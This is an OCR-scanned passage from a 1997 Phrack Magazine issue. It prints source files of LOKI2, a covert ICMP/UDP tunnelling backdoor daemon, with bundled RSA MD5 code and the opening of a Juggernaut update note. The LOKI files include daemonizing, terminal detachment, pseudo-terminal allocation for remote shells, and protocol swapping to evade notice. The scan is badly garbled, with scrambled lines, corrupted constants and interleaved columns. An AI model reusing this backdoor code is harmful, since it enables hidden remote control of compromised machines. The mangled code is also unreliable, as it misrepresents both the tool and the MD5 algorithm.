bzero((u_char *)buf2, 


4 * BUFSIZE 
/ 


+ + + + + F F— 
~ 


™~ 


update_client (locate_client (FIND), 


n 


Ok. 


This is an ugly hack to keep 


packet counts in sync with the 


st 
of 
th 
so 


Sy 


stat_client (locate_client (FIND), 


at request. We 
packets we are 
refore the byt 
we can preload 


5 * LOKIP_SIZE) ; 
buf2, prot, 


know the amount 
going to send 

count) 
the values. 


(and 
in advance 


uptime) ; 


/* breakdown payload into BUFSIZE-1 


* chunks, 


a 


suitable for transmission 


client <%d> requested an all kill\n", 
/* send notification to all clients */ 


Gel) 


c_id, host_look 
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for (; m < n; m += (BUFSIZE - 1)) 
{ 
bcopy (&buf2[m], buf, BUFSIZE - 1); 
lokid_xmit (buf, LP_DST, L REPLY, OKCR); 
} 
lokid_xmit (buf, LP_DST, L_EOT, OKCR); 
clean_exit (0); /* exit the child after sending 
* the last packet 
K/ 
} 
#ifndef STRONG_CRYPTO /* signal parent to change protocols */ 
if ('!strncemp (buf, SWAP_T, sizeof (SWAP_T) - 1)) 
{ 
if (kill(getppid(), SIGUSR1)) 
err_exit(l, 1, verbose, "[fatal] could not signal parent"); 
clean_exit (0); 
} 
#endif 
/* unsupport/unrecognized command */ 
lokid_xmit (S_MSG_UNSUP, LP_DST, L_REPLY, OKCR); 
lokid_xmit (buf2, LP_DST, L_EOT, OKCR); 
update_client (locate_client (FIND), p_sent, b_sent); 


* 


a7 


clean_exit (0); 


Swap transport protocols. 
a child server process. 


void swap_t (int signo) 


{ 


int n = 0; 
u_long client_ip = 0; 
struct protoent *pprot = 0; 
char buf [BUFSIZE] {0}; 


This is called as 


client <%d> requested a protocol swap\n", 


if (verbose) fprintf(stderr, "\nlokid: 
while (n < MAX CLIENT) 
{ 
if ((client_ip = check_client_ip(n++, &c_id))) 
{ 
fprintf(stderr, "\tsending protocol update: <%d> %s 
client_ip), n); 
lokid_xmit (buf, client_ip, L_REPLY, OKCR); 
lokid_xmit (buf, client_ip, L_EOT, OKCR); 
f® update_client (locate_client (FIND), p_sent, b_sent);*/ 


} 


close (tsock) ; 
= (prot == IPPROTO_UDP) 
if ((tsock socket (AF_INET, 
err_exit(1, 1, verbose, 
pprot getprotobynumber (prot); 
sprintf (buf, "lokid: tra 
fprintf(stderr, "\n%s", 


prot 


SOCK_RAW, 


buf); 


lokid_xmit (buf, LP_DST, L_R 
lokid_xmit (buf, LP_DST, L_EOT, 


update_client (locate_client (FIND), 


REPLY, OKCR); 
OKCR) ; 


2? IPPROTO_ICMP 


nsport protocol changed to %s\n", 


p_sent, 


IPPROTO_UDP; 


prot)) < 0) 


L_MSG_SOCKET) ; 


b_sent); 
/* re-establish signal 


[sd]\n", 


a result of SIGUSR1 from 


Gad); 


c_id, host_lookup ( 


pprot -> p_name); 


handler */ 
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if (signal(SIGUSR1, swap_t) == SIG_ERR) 
err_exit(l, 1, verbose, L_MSG_SIGUSR1); 


} 


/* EOF */ 

<--> lokid.c 

<++> L2/md5/Makefile 

# Makefile for MD5 from rfcl321 code 


CCF = =O =DMD=5 


md5c.o: md5.h global.h 
gece $(CCF) -c md5c.c 


clean: 

rm -f£f *.0 core 

<--> md5/Makefile 

<++> L2/md5/global.h 

/* GLOBAL.H - RSAREF types and constants 
A. 


/* PROTOTYPES should be set to one if and only if the compiler supports 
function argument prototyping. 
The following makes PROTOTYPES default to 0 if it has not already 
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been defined with C compiler flags. 
af 

ifndef PROTOTYPES 
define PROTOTYPES 0 
#endif 


ER defines a generic pointer type */ 
typedef unsigned char *POINTER; 


/* UINT2 defines a two byte word */ 
typedef unsigned short int UINT2; 


/* UINT4 defines a four byte word */ 
typedef unsigned long int UINT4; 


/* PROTO_LIST is defined depending on how PROTOTYPES is defined above. 
If using PROTOTYPES, then PROTO_LIST returns the list, otherwise it 
returns an empty list. 


*/ 


if PROTOTYPES 

define PROTO_LIST(list) list 
else 

define PROTO_LIST(list) () 
endif 


<--> md5/global.h 

<++> L2/md5/md5.h 

/* MD5.H header file for MD5C.C 
af 


/* Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All 
rights reserved. 


License to copy and use this software is granted provided that it 
is identified as the "RSA Data Security, Inc. MD5 Message-Digest 
Algorithm" in all material mentioning or referencing this software 
or this function. 
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License is also granted to make and use derivative works provided 
that such works are identified as "derived from the RSA Data 
Security, Inc. MD5 Message-Digest Algorithm" in all material 
mentioning or referencing the derived work. 


RSA Data Security, Inc. makes no representations concerning either 
the merchantability of this software or the suitability of this 
software for any particular purpose. It is provided "as is" 
without express or implied warranty of any kind. 
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These notices must be retained in any copies of any part of this 
documentation and/or software. 


*/ 

#define MD5 HASHSIZE 16 

/* MD5 context. */ 

typedef struct { 
UINT4 state[4]; /* state (ABCD) */ 
UINT4 count[2]; /* number of bits, modulo 2°64 (lsb first) */ 
unsigned char buffer[64]; /* input buffer */ 


} MD5_CTX; 


void MD5Init PROTO_LIST ((MD5_CTX *)); 
void MD5Update PROTO_LIST 
((MD5_CTX *, unsigned char *, unsigned int)); 
void MD5Final PROTO_LIST ((unsigned char [16], MD5_CTX *)); 
<--> md5/md5.h 
<++> L2/md5/md5c.c 
/* MD5C.C - RSA Data Security, Inc., MD5 message-digest algorithm 
A] 


/* Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All 
rights reserved. 


License to copy and use this software is granted provided that it 
is identified as the "RSA Data Security, Inc. MD5 Message-Digest 
Algorithm" in all material mentioning or referencing this software 
or this function. 


License is also granted to make and use derivative works provided 
that such works are identified as "derived from the RSA Data 
Security, Inc. MD5 Message-Digest Algorithm" in all material 
mentioning or referencing the derived work. 


RSA Data Security, Inc. makes no representations concerning either 
the merchantability of this software or the suitability of this 
software for any particular purpose. It is provided "as is" 
without express or implied warranty of any kind. 


These notices must be retained in any copies of any part of this 
documentation and/or software. 


*/ 


include "global.h" 
include "md5.h" 


/* Constants for MD5Transform routine. 


*/ 
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/* 
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* / 

define S11 7 

define S12 12 

define $13 17 

define S14 22 

#define S21 5 

define S22 9 

define S23 14 

define S24 20 

define S31 4 

define $32 11 

define S33 16 

define S34 23 

define S41 6 

define S42 10 

define S43 15 

define S44 21 


static void MD5Transform PROTO_LIST ((UINT4 [4], unsigned char [64])); 

static void Encode PROTO_LIST 
((unsigned char *, UINT4 *, unsigned int)); 

static void Decode PROTO_LIST 
((UINT4 *, unsigned char *, unsigned int)); 

static void MD5_memcpy PROTO_LIS ((POINTER, POINTER, unsigned int)); 

static void MD5_memset PROTO_LIST ((POINTER, int, unsigned int)); 


static unsigned char PADDING[6 { 
0x80, 0, O, O, O, O, O, O, O, OF 0%. 10° Oy. Oy O93 OY Oy O05 HOF 60, 
0, 0, O, 0, O, 0, 0, O, O, 0, O, 0, O, O, 0, O, O, 0, O, 0, 0, 0, O, 
0, O, O, O, O, 0, O, O, O, O, O, O, O, O, O, O, O, O, O 

}; 


4) = 


/* F, G, H and I are basic MD5 functions. 
wei 

define F(x, y, 
define G(x, y, 
define H(x, y, 
define I(x, y, 


)) | (C(x) & (2))) 
) 


Se eS Re 


NN NN 


/* ROTATE_LEFT rotates x left n bits. 
ey: 
#define ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32-(n)))) 


/* FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4. 
Rotation is separate from addition to prevent recomputation. 

*/ 
#define FF(a, b, c, da, x, s, ac) { \ 


(a) += F ((b), (c), (d)) + (x) + (UINT4) (ac); \ 
(a) = ROTATE_LEFT ((a), (s)); \ 
(a) += (b); \ 


#define GG(a, b, c, d, x, s, ac) { \ 
, (c), (d)) + (x) + (UINT4) (ac); \ 
a) = ROTATE_LEFT ((a), (s)); \ 


a) += (b); \ 
} 
#define HH(a, b, c, d, x, s, ac) { \ 
(a) += H ((b), (c), (d)) + (x) + (UINT4) (ac); \ 
(a) = ROTATE_LEFT ((a), (s)); \ 
(a) += (Bb); N 
} 
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#define II(a, b, c, d, x, 8s, ac) { \ 


(a) += I ((b), (c), (d)) + (x) + (UINT4) (ac); \ 
(a) = ROTATE_LEFT ((a), (s)); \ 
(a). += (by GN 


/* MD5 initialization. Begins an MD5 operation, writing a new context. 


Ky 
void MD5Init (context) 
MD5_CTX *context; 

{ 


context-—>count [0] = context->count[1] = 0; 
/* Load magic initialization constants. 

a 
context-—>state[0] = 0x67452301; 
context-—>state[1] = Oxefcdab89; 
context->state[2] = 0x98badcfe; 
context-—>state[3] = 0x10325476; 


} 


/* context */ 


/* MD5 block update operation. Continues an MD5 message-digest 
operation, processing another message block, and updating the 


context. 

Py. 
void MD5Update (context, input, inputLen) 
MD5_CTX *context; 
unsigned char *input; 


/* context */ 
/* input block */ 


unsigned int inputLen; /* length of input block */ 


{ 


unsigned int i, index, partLen; 


/* Compute number of bytes mod 64 */ 


index = (unsigned int) ((context->count[0] >> 3) & Ox3F); 


/* Update number of bits */ 


if ((context->count[0] += ((UINT4)inputLen << 3)) 
/* 
Rivest 
REC. 1321 MD5 Message-Digest Algorithm 
a 


< ((UINT4)inputLen << 3)) 
context-—>count [1]++; 
context-—>count[1] += ((UINT4)inputLen >> 29); 


partLen = 64 index; 


/* Transform as many times as possible. 
typ 

if (inputLen >= partLen) { 
MD5_memcpy 


( (POINTER) &écontext—>buffer[index], (POINTER) input, 


MD5Transform (context-—>state, context—>buffer); 


for (i = partLen; i + 63 < inputLen; i += 64) 
MD5Transform (context->state, &input[i]); 


index = 0; 
} 

else 
i = 0; 


/* Buffer remaining input */ 
MD5_memcpy 
( (POINTER) &context—->buffer[index], (POINT 


Gl 


R) &input [i 
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partLen); 


l, 


6.txt Wed Apr 26 09:43:42 2017 39 


inputLen-i); 


} 


/* MD5 finalization. 
th 
KY 
void MD5Final (digest, context) 
unsigned char digest[16]; 
MD5_CTX *context; 
{ 
unsigned char bits[8]; 
unsigned int index, padLen; 


message digest and zeroizing the context. 


/* Save number of bits */ 


Encode (bits, context->count, 8); 
/* Pad out to 56 mod 64. 
*/ 
index = (unsigned int) ((context->count[0] >> 3) 
padLen = (index < 56) ? (56 - index) (120 - index); 
MD5Update (context, PADDING, padLen) ; 
/* Append length (before padding) */ 
MD5Update (context, bits, 8); 
/* 
Rivest 
RFC 1321 MD5 Message-Digest Algorithm 
yf. 


/* Store state in digest */ 
Encode (digest, context-—>state, 


16); 


/* Zeroize sensitive information. 
ca 
MD5_memset 


} 


( (POINTER) context, 0, sizeof (*context)); 


/* MD5 basic transformation. 


sv 


static void MD5Transform (state, block) 

UINT4 state[4]; 

unsigned char block[64]; 

{ 
UINT4 a = state[0], b = state[1], c = state[2], d= 
Decode (x, block, 64); 
/* Round 1 */ 
FF (a, b, c, da, x[ 0], S11, Oxd76aa478); /* 1 */ 
FF (d, a, b, c, x[ 1], $12, Oxe8c7b756); /* 2 */ 
FF (c, d, a, b, x[ 2], $13, 0x242070db); /* 3 */ 
FF (b, c, d, a, x[ 3], $14, Oxclbdceee); /* 4 */ 
FF (a, b, c, d, x[ 4], S11, Oxf57cOfaf); /* 5 */ 
FF (d, a, b, c, x[ 5], S12, 0x4787c62a); /* 6 */ 
FF (c, d, a, b, x[ 6], S13, 0xa8304613); /* 7 */ 
FF (b, c, d, a, x[ 7], $14, Oxfd469501); /* 8 */ 
FF (a, b, c, d, x[ 8], S11, 0x698098d8); /* 9 */ 
FF (d, a, b, c, x[ 9], S12, Ox8b44f7af); /* 10 */ 
FF (c, d, a, b, x[10], $13, Oxffff5bb1); /* 11 */ 
FF (b, c, d, a, x[11], $14, 0x895cd7be); /* 12 */ 
FF (a, b, c, d, x[12], S11, 0x6b901122); /* 13 */ 
FF (d, a, b, c, x[13], $12, Oxfd987193); /* 14 */ 
FF (c, d, a, b, x[14], $13, 0xa679438e); /* 15 */ 
FF (b, c, d, a, x[15], S14, 0x49b40821); /* 16 */ 


Ends an MD5 message-digest operation, 


writing the 


/* message digest */ 


/* context */ 


& Ox3f£); 


1’ 
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Transforms state based on block. 


state[3], 


x[16]; 
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/* Round 2 */ 
GG (a, b, c, d, 
GG (d, a, b, c, 
GG (c, d, a, b, 
GG (b, c, d, a, 
GG (a By Cz: dp 
GG (a. ay. Op Oey 
GG (c, d, a, b, 
GG (b, Cy, d, ay 
GG (a, b, c, d, 
GG (d, a, b, c, 
GG (c, d, a, b, 

/* 

Rivest 

RFC 1321 

xe] 
GG (b, c, d, a, 
GG (a, by uey ids 
GG (d, a, b, c, 
GG (c, d, a, b, 
GG (b, Cy, d, ay 
/* Round 3 */ 
rit (a, b, Cy, d, 
rit (d, ay by Cy, 
rit (Cc, d, ay b, 
rit (b, Cy, d, ay 
rit (a, b, Cy, d, 
rit (d, ay b, Cy, 
rit (Cc, d, ay b, 
rit (b, Cy, d, ay 
rit (a, b, Cy, d, 
rit (d, ay b, Cy, 
rit (Gy d, ay b, 
rit (b, Cy, d, ay 
rit (a, b, Cy, d, 
mii (d, ay b, Cy, 
mii (CF d, ay b, 
mii (b, Cy d, ary 
/* Round 4 */ 
LT (Cat; bye od. -O'y 
TT .(; sa; Dy “63 
ET (Gy. «dy “ay. by 
Te? “Gy. Ie. 2g, seep 
EE. “Caly- 25! «Gy al, 
DE (iy: ay" Dp Sy 
ET, “CG; “Gy..-ay Dy 
TET, 4p. Get FO: 5 Seley 
TT ‘(a 1, "C7, -d; 
TE Ce sais. Jog OCs, 
TT 106; d;. sap. BD; 
LT. 163. Gp. dy taky 
II (a, b, c, d, 
LE. 6p ay. Dy. Cy 
Tks 6656 ody. sai Dy 
TE (by. Gj}. die 2a; 
state[0] += a; 
state[1] = b; 
state[2] += c; 
state[3] += d; 


/* Zeroize sensitive 


xxx mM MMM KM MK OM 


x x xm Mm XM 


x xm MMMM MK KM MK MM KM OM 


xxxM MMMM MK KM MM MM KM OM 
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5 824; 
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Oxf£61e2562 
0xc040b340 
O0x265e5a51 
Oxe9b6c7aa 


1, 
¥ 


’ 


Oxd62£105d) ; 


0x2441453 
Oxd8ale681 
Oxe7d3fbc8 
Ox2lelcde6é 
0xc33707d6 
Oxf4d50d87 


) 
) 
) 
) 
) 
) . 
) 
) 
) 
) 
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Ay: 


MD5_ memset ((POINTER)x, 0, sizeof (x)); 


/* Encodes input (UINT4) into output (unsigned char). Assumes len is 
a multiple of 4. 
ard 
static void Encode (output, input, len) 
unsigned char *output; 
UINT4 *input; 
unsigned int len; 


unsigned int i, Jj; 


for (i = 0, j = 0; 3 < len; itt, j += 4) { 
output[j] = (unsigned char) (input[i] & Oxff); 
output [j+1] = (unsigned char) ((input[i] >> 8) & Oxff); 
output [j+2] = (unsigned char) ((input[i] >> 16) & Oxff); 
output [j+3] = (unsigned char) ((input[i] >> 24) & Oxff); 


} 


/* Decodes input (unsigned char) into output (UINT4). Assumes len is 
a multiple of 4. 

mf 

static void Decode (output, input, len) 

UINT4 *output; 

unsigned char *input; 

unsigned int len; 

{ 


unsigned int i, Jj; 


for (i = 0, j = 0; j < len; itt, j 
output [i] = ((UINT4)input[j]) | (((UINT4)input[j+1]) << 8) | 
(((UINT4) input [j+2]) << 16) | (((UINT4)input[4j+3]) << 24); 


} 


/* Note: Replace "for loop" with standard memcpy if possible. 
*/ 


static void MD5_memcpy (output, input, len) 
POINTER output; 

POINTER input; 

unsigned int len; 

{ 


unsigned int i; 


for (i = 0; i < len; i++) 


/* 
Rivest [Page 15] 
RFC 1321 MD5 Message-Digest Algorithm April 1992 
tif 

output [i] = input[i]; 


} 


/* Note: Replace "for loop" with standard memset if possible. 
ey 


static void MD5_memset (output, value, len) 
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POINTER output; 
int value; 
unsigned int len; 
{ 


unsigned int i; 


for (i = 0; i < len; 


((char *)output) [i] = 


} 
<--> md5/md5c.c 
<++> L2/pty.c 


itt) 


(char) value; 


/* 
* LOKI 

* 

x [LE -pryie: J 

* 

* 1996/7 Guild Corporation Worldwide [daemon9] 
* All the PTY code ganked from Stevens. 

*/ 

ifdef PTY 


include "loki.h" 


extern int verbose; 


/* 


Open a pty and establish it as the session leader with a 
controlling terminal 


*/ 


pid_t pty_fork(int *fdmp, 


lave_winsize) 


{ 


int fdm, fds; 
pid_t pid; 
char pts_name[20]; 


char *slavename, 


if ((fdm = ptym_open(pts_name)) < 0) 
err_exit(l1, 0, verbose, "\nCannot open master pty\n"); 
if (slavename) strcpy(slavename, pts_name); 
if ((pid = fork()) < 0) return (-1); 
else if (!pid) 
if (setsid() < 0) 


close (fdm); 


if defined (TIOCSCTTY) 
if (ioctl(fds, 


endif 


i 


err_exit(l1, 


err_exit(l1, 


1, 


0, 


verbose, "\nCannot set session"); 


if ((fds = ptys_open(fdm, pts_name)) < 0) 
err_exit(l1, 


verbose, "\nCannot open slave pty\n"); 


&& !defined(CIBAUD) 
TIOCSCTTY, (char *)0) < QO) 
verbose, "\nioctl"); 


1, 


fF (slave_termios) 
err_exit(l, 1, verbose, 


if (slave_winsize) 


if 


(t 


"\nCannot set termio"); 


/* set termios/winsize */ 


struct termios *slave_termios, 


struct winsize *s 


csetattr(fds,TCSANOW, (struct termios *)slave_termios) < 0) 


/* slave becomes stdin/stdout/stderr */ 


if (dup2 (fds, 


if (dup2 (fds, 


err_exit(l1, 


S) 


err_exit(l, 


S 


err_exit(l1, 


if (i1octl(fds, TIOCSWINSZ, slave_winsize) 
1, verbose, "\nioctl"); 
[DIN _FILENO) != STDIN_FILENO) 
0, verbose, "\ndup\n"); 
DOUT_FILENO) != STDIN_FILENO) 
0, verbose, "\ndup\n"); 


< 0) 
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if (dup2(fds, STDERR_FILENO) != STDIN_FILENO) 
err_exit(1, 0, verbose, "\ndup\n"); 
if (fds > STDERR_FILENO) close(fds); 


return (0); /* return child */ 
} 
else 
{ 
*fdmp = fdm; /* Return fd of master */ 
return (pid); /* parent returns PID of child */ 


* Determine which psuedo terminals are available and try to open one 
int ptym_open(char *pts_name) 


int fdm = 0; /* List of ptys to run through */ 
char *pl = "pgqrstuvwxyzPORST", *p2 = "0123456789abcdef"; 


strcpy(pts_name, "/dev/pty00"); /* pty device name template */ 


for .Cp. *ply pales) 
{ 
pts_name[8] = *pl; 
for (; *p2; p2tt) 
{ 
pts_name[9] = *p2; 
if ((fdm = open(pts_name, O_RDWR)) < 0) 
{ 
/* device doesn’t exist */ 
if (errno == ENOENT) return (-1); 
else continue; 


} 


pts_name[5] = ’t’; /* pty -> tty */ 
return (fdm); /* master file descriptor */ 
} 
} 
return (-1); /* control falls here if no pty 
* devices are available 
2 /- 
} 
/* 
* Open the slave device and set ownership and permissions 
*/ 


int ptys_open(int fdm, char *pts_name) 


struct group *gp; 
int gid = 0, fds = 0; 


if ((gp = getgrnam("tty"))) gid = (gp -> gr_gid); 
else gid = -1; /* Group tty is not in the group file */ 
chown (pts_name, getuid(), gid); /* make it ours */ 

/* set permissions -rw--w---- */ 


chmod(pts_name, S_IRUSR | S_IWUSR | S_IWGRP); 


if ((fds = open(pts_name, O_RDWR)) < 0) 
{ 


6.txt 


} 


return 


} 
#endif 


/* EOF 
<=-=> pte 
<++> L2 
/* 


LOKI 


[ 


+ + + + F F 


ud 


shm.c 


Wed Apr 26 09:43:42 2017 
close (fdm) 


return 


S/ 
y.c 
/shm.c 


2 


] 


1996/7 Guild Corporation Worldwide 


e "loki 


lud 
lud 


extern 
extern 
extern 
struct 
int sem 


ifdef 
extern 
extern 
endif 


/* 


* Pr 


€ 
e 


struct 


44 


1’ 


(-1); 


(fds); 


sae 
"client_db.h" 
"shm.h" 


loki rdg; 


int verbose; 
int destroy_shm; 


cl 


ient_] 


ist *client 0; 


id; 


STRONG_CRYPTO 
short ivec_salt; 


u_char user_key[BF_K 


EYSIZE 


*/ 


par 


shared memory and semaphore 


void prep_shm() 


{ 


/* Cannot open fds */ 


[daemon9] 


key_t shmkey = SHM_KEY + getpid(); /* shared memory key ID */ 
key_t semkey = SEM_KEY + getpid(); /* semaphore key ID */ 
int shmid, len = 0, i = 0; 
len = sizeof (struct client_list) * MAX_CLIENT; 
/* Request a shared memory segment */ 
if ((shmid = shmget(shmkey, len, IPC_CREAT)) < 0) 
err_exit(1, 1, verbose, "[fatal] shared mem segment request error"); 
/* Get SET_SIZE semaphore to perform 
* shared memory locking with 
ef 
if ((semid = semget(semkey, SET_SIZE, (IPC_CREAT | SHM_PRM))) < 0) 
err_exit(l, 1, verbose, "[fatal] semaphore allocation error "); 
/* Attach pointer to the shared memory 
* segment 
mf 
client = (struct client_list *) shmat(shmid, NULL, (int) NULL); 
/* clear the database */ 
for (; i < MAX_CLIENT; it+) bzero(&client[i], sizeof(client[i])); 


/* 
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Locks the semaphore so the caller can access th 
This is an atomic operation. 


Af 


void locks () 


{ 


struct sembuf lock[2] 
{ 


{0, 0, O}, 
{0, 1, SEM_UNDO} 
}; 
if (semop(semid, &lock[0], 2) < 0) 
err_exit(l, 1, verbose, "[fatal] could not lo 


shared memory segment. 


ck memory"); 


shared memory segment. 


Unlocks the semaphore so the caller can access th 
* This is an atomic operation. 
xf 

void ulocks() 


{ 


struct sembuf ulock[1] 
{ 


{ 0, -1, (IPC_NOWAIT | SEM_UNDO) } 
}; 
if (semop(semid, &ulock[0], 1) < 0) 
err_exit(l, 1, verbose, "[fatal] 
} 
/* 
* Release the shared memory segment. 
*/ 


void dump_shm() 
{ 


could not unlock memory"); 


locks(); 
if ((shmdt ((u_char *)client)) == -1) 
err_exit(l, 1, verbose, "[fatal] 
if (destroy_shm == OK) 
{ 
if ((shmctl(semid, IPC_RMID, NULL)) == -1) 
err_exit(l, 1, verbose, "[fatal] 
if ((semctl(semid, IPC_RMID, (int)NULL, NULL) 
err_exit(l, 1, verbose, "[fatal] 
} 
ulocks(); 
} 
/* EOF */ 


<--> shm.c 
<++> L2/shm.h 
/* 


* 


LOKI 
shm header file 


1996/7 Guild Corporation Productions [daemon9] 


/ 


+ + F + F 


shared mem segment detach 


Fror™).} 


cannot destroy shmid"); 


) <1) 


cannot destroy semaphore"); 
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define SHM_KEY 242 /* Shared memory key *y 
define SEM_KEY 424 /* Semaphore key * / 
define SHM_PRM S_IRUSR|S_IWUSR /* Shared Memory Permissions iad 
define SET_SIZE 1 
void prep_shm(); /* prepare shared mem segment * / 
void locks (); /* lock shared memory Ke. 
void ulocks(); /* unlock shared memory * / 
void dump_shm(); /* release shared memory */ 


<--> shm.h 
<++> L2/surplus.c 
/* 

* LOKI2 


[ surplus.c ] 


1996/7 Guild Corporation Worldwide [daemon9] 


+ + F F 


/ 


#include "loki.h" 


extern int verbose; 
extern jmp_buf env; 


#define WORKING_ROOT "/tmp" /* Sometimes we make mistakes. 
Sometimes w xecute commands we 
didn’t mean to. ‘ym -rf*‘ is much 
easier to palate from /tmp 

*/ 

/* 

* Domain names / dotted-decimals --> network byte order. 
=f 


u_long name_resolve(char *hostname) 


{ 


struct in_addr addr; 

struct hostent *hostEnt; 

/* name lookup failure */ 
if ((addr.s_addr = inet_addr(hostname)) == -1) 

{ 


if (!(hostEnt = gethostbyname (hostname) ) ) 
err_exit(l1, 1, verbose, "\n[fatal] name lookup failed"); 
bcopy (hostEnt->h_addr, (char *)&addr.s_addr, hostEnt -> h_length); 


} 


return (addr.s_addr)j; 


/* 
* Network byte order --> dotted-decimals. 


w/ 


char *host_lookup(u_long in) 


{ 


char hostname [BUFSIZ] = {0}; 
struct in_addr addr; 


addr.s_addr = in; 
strepy (hostname, inet_ntoa(addr)); 
return (strdup(hostname) ); 


} 


#ifdef X86FAST_CH 


fal 
Q 
nN 
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/* 
* Fast x86 based assembly implementation of the IP 
“nd 


u_short i_check(u_short *buff, int len) 


{ 


u_long sum = 0; 
if (len > 3) 
{ 


—_asm__("clc\n" 


Wels tee 

"Lodsl\n\t" 

"adcl %%eax, %%ebx\n\t" 
"loop 1b\n\t" 


"adcl $0, %%ebx\n\t" 

"movl %%ebx, %%eax\n\t" 

"Shrl $16, %%eax\n\t" 

"addw %%ax, %%bx\n\t" 

"adcew $0, %%bx" 
"=p" (sum) , "=S" (buff) 
non (sum) Ye" (ten S> 2) 41) (ure) 
Naxt, WGK s Watt ep. cu ar 


if (len & 2) 


__asm__("lodsw\n\t" 

"addw %%ax, %%bx\n\t" 

"adcew $0, %%bx" 
"=p" (sum) , "=S" (buff) 
"O" (sum), "c" (len >> 2) ,"1" (buff) 
Mage, MG WS aA WOx 


if (len & 2) 


__asm__("lodsw\n\t" 

"addw %%ax, %%bx\n\t" 

"adcew $0, %%bx" 
"=p" (sum), "=S" (buff) 
"O" (sum), "1" (buff) 
MKS Max tz Woah) 


if (len & 1) 


_—_asm__("lodsb\n\t" 
"movb $0, %*%ah\n\t" 
"addw %%ax, %%bx\n\t" 
"adcew $0, %%bx" 
"=b" (sum); "=S™ (buff) 
"O" (sum), "1" (buff) 
OK ob Ga Ws Myce 


if (len & 1) 


__asm__("lodsb\n\t" 
"movb $0, %*%ah\n\t" 
"addw %%ax, %%bx\n\t" 
"adcew $0, %%bx" 
"=p" (sum), "=S" (buff) 
TO" -€sum),- “SL -(Cout£) 
"Ox, Nase" | Wei); 
} 
sum = “sum; 
return (sum & Oxffff); 


checksum routine. 
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#else 
/* 

* Standard IP Family checksum routine. 


*/ 


u_short i_check(u_short *ptr, int nbytes) 


{ 


register long sum = 0; 
u_short oddbyte = 0; 
register u_short answer = 0; 


while (nbytes > 1) 
{ 
sum += *ptrt++; 
nbytes -= 2; 
} 
if (nbytes == 1) 
{ 
oddbyte = 0; 
*((u_char *)&oddbyte) =* (u_char *)ptr; 


sum += oddbyte; 
} 
sum = (sum >> 16) + (sum & Oxffff); /* add hi 16 to low 16 */ 
sum += (sum >> 16); 
answer = ~sum; 


return (answer); 


} 


#endif /* X86FAST_CHECK */ 


/* 
* Generic exit with error function. If checkerrno is true, errno should 
be looked at and we call perror, otherwise, just dump to stderr. 
Additionally, we have the option of suppressing the error messages by 
zeroing verbose. 
*/ 


void err_exit(int exitstatus, int checkerrno, int verbalkint, char *errstr) 
{ 
if (verbalkint) 
{ 
if (checkerrno) perror(errstr) ; 
else fprintf(stderr, errstr); 


} 


clean_exit (exitstatus); 


/* 
* SIGALRM signal handler. We reset the alarm timer and default signal 
Signal handler, then restore our stack frame from the point that 
* setjmp() was called. 

*/ 


void catch_timeout (int signo) 


{ 


alarm(0); /* reset alarm timer */ 


/* veset SIGALRM, our handler will 
* be again set after we longymp () 
wY 
if (signal (SIGALRM, catch_timeout) == SIG_ERR) 
err_exit(l1, 1, verbose, L_MSG_SIGALRM) ; 
/* restore environment */ 
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longjmp(env, 1); 


/* 
* Clean exit handler 


«ff 


void clean_exit (int status) 


{ 


extern int tsock; 
extern int ripsock; 


close (ripsock) ; 
close (tsock); 
exit (status); 


} 
/* 


* Keep child proccesses from zombiing on us 


*/ 


void reaper(int signo) 
{ 


int sys = 0; 
wait (&sys) ; /* get child’s exit status */ 
/* re-establish signal handler */ 


if (signal(SIGCHLD, reaper) == SIG_ERR) 
err_exit(l, 1, verbose, L_MSG_ SIGCHLD) ; 


} 
/* 


* Simple daemonizing procedure. 


*/ 


void shadow () 
{ 
extern int errno; 
int fd = 0; 


close (STDIN_FILENO) ; /* We no longer need STDIN */ 
if (!verbose) 
{ /* Get rid of these also */ 


close (STDOUT_FILENO) ; 
close (STDERR_FILENO) ; 


/* Tgnore read/write signals from/to 
* the controlling terminal. 


of, 
signal (SIGTTOU, SIG_IGN); 
signal (SIGTTIN, SIG_IGN); 
signal (SIGTSTP, SIG_IGN); /* Ignore suspend signal. */ 
switch (fork ()) 
{ 
case 0: /* child continues */ 
break; 
default: /* parent exits */ 
clean_exit (0); 
case -1: /* fork error */ 
err_exit(l, 1, verbose, "[fatal] Cannot go daemon"); 


/* Create a new session and set this 
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} 


* process to be the group leader. 
Mle 
if (setsid() == -1) 
err_exit(l, 1, verbose, "[fatal] Cannot create session"); 
/* Detach from controlling terminal */ 
if ((fd = open("/dev/tty", O_RDWR)) >= 0) 


if ((ioctl(fd, TIOCNOTTY, (char *)NULL)) == -1) 
err_exit(l, 1, verbose, "[fatal] cannot detach from controlling terminal"); 
close (fd); 

} 


errno = 0; 
chdir (WORKING_ROOT) ; /* Working dir should be the root */ 
umask (0); /* File creation mask should be 0 */ 


#ifdef DEBUG 


/* 


* 


*/ 


Bulk of this function taken from Stevens APUE... 
got this from Mooks (LTC) 


void fd_status(int fd, int newline) 


{ 


/* 


int accmode 0, val = 0; 


val = fentl(fd, F_GETFL, 0); 
if !defined(pyr) && !defined(ibm032) && !defined(sony_news) && !defined (NeXT) 
accmode = val & O_ACCMODE; 
else /* pyramid */ 
accmode = val; /* kludge */ 
endif /* pyramid */ 
if (accmode == O_RDONLY) fprintf(stderr, " read only"); 
else if (accmode == O_WRONLY) fprintf(stderr, " write only"); 
else if (accmode == O_RDWR) fprintf(stderr, " read write"); 
if (val & O_APPEND) fprintf(stderr, " append"); 
if (val & O_NONBLOCK) fprintf(stderr, " nonblocking"); 
else fprintf(stderr, " blocking"); 
if defined (O_SYNC) 
if (val & O_SYNC) fprintf(stderr, " sync writes"); 
else 
if defined (O_FSYNC) 
if (val & O_FSYNC) fprintf(stderr, " sync writes"); 
endif /* O_FSYNC */ 
endif /* O_SYNC */ 
if (newline) fprintf(stderr, "\r\n"); 
} 
endif /* DEBUG */ 


EOF */ 


<--> surplus.c 


----[ EOF 
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---[ Phrack Magazine Volume 7, Issue 51 September 01, 1997, article 07 of 17 


[ Juggernaut 1.2 update 


—------- [ route <route@infonexus.com> 


Well, Juggernaut went out, and the bug reports came in... 
Juggernaut, the robust network tool for Linux, originally went out in Phrack 
50. This patchfile updates Juggernaut 1.0 (the version in P50-06) to version 
1.2. It offers the following: 


- Nonfunctional things like nomenclature and cosmetics. 

—- The IFF_PROMISC flag is unset upon exit. Previously the program would 

leave the network interface in promiscuous mode. 

—- We no longer are interested in HTTP connections (unless -DGREED is 
defined). 

